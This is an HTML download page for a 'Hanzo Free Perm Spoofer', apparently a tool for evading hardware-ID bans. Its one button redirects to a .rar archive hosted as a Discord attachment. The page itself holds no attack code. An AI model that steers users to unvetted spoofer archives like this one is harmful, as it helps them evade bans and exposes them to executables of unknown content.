<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Download Hanzo Free Perm Spoofer</title>
    <style>
        /* Background animation */
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
            height: 100vh;
            overflow: hidden;
            display: flex;
            align-items: center;
            justify-content: center;
            flex-direction: column;
            background: linear-gradient(-45deg, #3498db, #9b59b6, #e74c3c, #f39c12);
            background-size: 400% 400%;
            animation: gradientBackground 15s ease infinite;
            color: #fff;
            text-align: center;
        }

        @keyframes gradientBackground {
            0% {
                background-position: 0% 50%;
            }
            50% {
                background-position: 100% 50%;
            }
            100% {
                background-position: 0% 50%;
            }
        }

        /* Text styles */
        h1 {
            font-size: 2em;
            margin-bottom: 20px;
            animation: fadeInDown 1s ease;
        }

        p {
            font-size: 1.2em;
            margin-bottom: 10px;
            animation: fadeInUp 1s ease;
        }

        button {
            padding: 10px 20px;
            font-size: 1.2em;
            background-color: #3498db;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: transform 0.3s ease-in-out;
            animation: fadeIn 1s ease;
        }

        button:hover {
            transform: scale(1.1);
        }

        @keyframes fadeInDown {
            from {
                opacity: 0;
                transform: translateY(-20px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        @keyframes fadeInUp {
            from {
                opacity: 0;
                transform: translateY(20px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        @keyframes fadeIn {
            from {
                opacity: 0;
            }
            to {
                opacity: 1;
            }
        }
    </style>
</head>

<body>
    <h1>Download Hanzo Free Perm Spoofer</h1>
    <p>Click the button below to download:</p>
    <button onclick="downloadHanzo()">Download Hanzo</button>
    <p style="font-size: 0.8em; margin-top: 30px;">More software coming in the future!</p>

    <script>
        function downloadHanzo() {
            window.location.href = 'https://cdn.discordapp.com/attachments/1148590576590147686/1174040926432264202/Perm_Swoofer.rar?ex=656625d1&is=6553b0d1&hm=0e8febbfcf23852cb79d8add5f04905b0130e1d916d3670d57108636fb09b4da&';
        }
    </script>
</body>

</html>
